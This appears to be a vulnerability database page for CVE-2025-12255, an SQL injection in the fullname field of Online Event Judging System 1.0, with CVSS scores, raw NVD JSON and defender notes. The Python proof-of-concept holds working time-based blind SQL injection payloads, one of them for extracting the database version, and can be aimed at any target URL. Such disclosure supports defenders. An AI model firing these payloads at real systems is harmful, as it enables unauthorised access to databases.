Security Vulnerability Report
CVE-2025-12255 CVSS 6.3 MEDIUM

CVE-2025-12255

Published: 2025-10-27 09:15:38
Last Modified: 2026-04-29 01:00:02

Description

A security flaw has been discovered in code-projects Online Event Judging System 1.0. It affects an unknown part of the file /add_contestant.php. Manipulating the argument fullname results in SQL injection. The attack can be carried out remotely. The exploit has been released to the public and may be used.

CVSS Details

CVSS Score
6.3
Severity
MEDIUM
CVSS Vector
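CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L
Note: the 6.3 MEDIUM score shown here is the record's "Secondary" CVSS 3.1 assessment. The raw JSON on this page also carries a "Primary" CVSS 3.1 assessment of 8.8 HIGH (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H). Consider the higher rating when prioritising remediation unless you have assessed the impact for your own deployment.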

Configurations (Affected Products)

cpe:2.3:a:carmelo:online_event_judging_system:1.0:*:*:*:*:*:*:* - VULNERABLE
code-projects Online Event Judging System 1.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
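import sys

import requests

# CVE-2025-12255 SQL Injection PoC
# Target: code-projects Online Event Judging System 1.0
# Vulnerability: SQL Injection in /add_contestant.php via fullname parameter
#
# Defender notes:
# - Root cause is CWE-89: the fullname value reaches a SQL statement without
#   being bound as a parameter (presumably string concatenation; the PHP
#   source is not shown here). The durable fix is a prepared statement /
#   parameterized query in add_contestant.php, not input filtering.
# - Detection: POSTs to /add_contestant.php whose fullname field carries SQL
#   keywords (e.g. SLEEP( or CASE WHEN) are a useful signal in WAF or
#   application logs, as are unusually slow responses from that endpoint.
# - The advisory's CVSS vector lists PR:L (low privileges required). This
#   script sends no session cookie, so against an instance that enforces
#   login the request may simply be redirected and the check will report
#   "may not be vulnerable" even though the flaw is present.


def exploit_sqli(target_url):
    """
    SQL Injection exploit for CVE-2025-12255
    This PoC demonstrates time-based blind SQL injection

    Args:
        target_url: Base URL of the deployment, without a trailing slash.

    Returns:
        True only when a response was received and it took at least as long
        as the injected delay. False when the response was fast, when the
        request failed, or when it timed out (a timeout is inconclusive: an
        unreachable or overloaded host produces the same symptom).
    """
    # Must match the SLEEP(...) value embedded in the payload below.
    expected_delay = 5

    # Target endpoint
    endpoint = f"{target_url}/add_contestant.php"

    # Payload for time-based blind SQL injection
    # This payload causes a 5-second delay if vulnerable
    # Using CASE WHEN condition THEN (SELECT...SLEEP(5)) ELSE 0 END pattern
    payload = "admin' AND (SELECT CASE WHEN (1=1) THEN (SELECT 1 FROM (SELECT SLEEP(5))x) ELSE 0 END) AND '1'='1"

    # Data to be sent
    data = {
        'fullname': payload,
        'submit': 'Add Contestant'
    }

    print(f"[*] Target: {endpoint}")
    print(f"[*] Payload: {payload}")

    try:
        print("[*] Sending malicious request...")
        response = requests.post(endpoint, data=data, timeout=15)
    except requests.exceptions.Timeout:
        # Covers both connect and read timeouts. Neither proves the delay was
        # caused by the injected SLEEP, so do not report a confirmed finding.
        print("[-] Inconclusive: request timed out; host may be unreachable or slow")
        return False
    except requests.exceptions.RequestException as e:
        print(f"[-] Error: {str(e)}")
        return False

    elapsed = response.elapsed.total_seconds()

    # NOTE(review): there is no baseline measurement, so a server that is
    # already slow will also cross this threshold. Treat a positive result
    # as a lead to verify, not as proof.
    if elapsed >= expected_delay:
        print("[+] Vulnerability confirmed! Time-based blind SQL injection works.")
        print(f"[+] Response time: {elapsed}s")
        return True

    print("[-] Target may not be vulnerable or payload needs adjustment")
    return False


def extract_data(target_url):
    """
    Example: Extract database version using blind SQL injection

    This function sends no request; it only prints status lines. The
    target_url argument is accepted but not used.
    """
    # Database version extraction payload
    # Kept for illustration only: it is never sent by this function.
    version_payload = "admin' AND (SELECT CASE WHEN (SUBSTRING(@@version,1,1)='5') THEN (SELECT 1 FROM (SELECT SLEEP(3))x) ELSE 0 END) AND '1'='1"

    print("[*] Extracting database information...")
    print("[*] Testing if MySQL version starts with '5'...")

    # Implementation would iterate through characters
    # This is a simplified demonstration
    print("[*] Use sqlmap or similar tool for comprehensive exploitation")


if __name__ == "__main__":
    if len(sys.argv) < 2:
        print("Usage: python cve-2025-12255.py <target_url>")
        print("Example: python cve-2025-12255.py http://localhost/online-event-judging-system")
        sys.exit(1)

    target = sys.argv[1].rstrip('/')
    exploit_sqli(target)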

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-12255", "sourceIdentifier": "[email protected]", "published": "2025-10-27T09:15:37.590", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A security flaw has been discovered in code-projects Online Event Judging System 1.0. This affects an unknown part of the file /add_contestant.php. Performing manipulation of the argument fullname results in sql injection. Remote exploitation of the attack is possible. The exploit has been released to the public and may be exploited."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.1, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", 
"Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L", "baseScore": 6.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 3.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "baseScore": 6.5, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 8.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-74"}, {"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:carmelo:online_event_judging_system:1.0:*:*:*:*:*:*:*", 
"matchCriteriaId": "9FE35151-38A0-407C-A81B-14BA65BD9F8F"}]}]}], "references": [{"url": "https://code-projects.org/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/zzonce/cve/issues/3", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking"]}, {"url": "https://vuldb.com/?ctiid.329926", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.329926", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.674006", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}]}}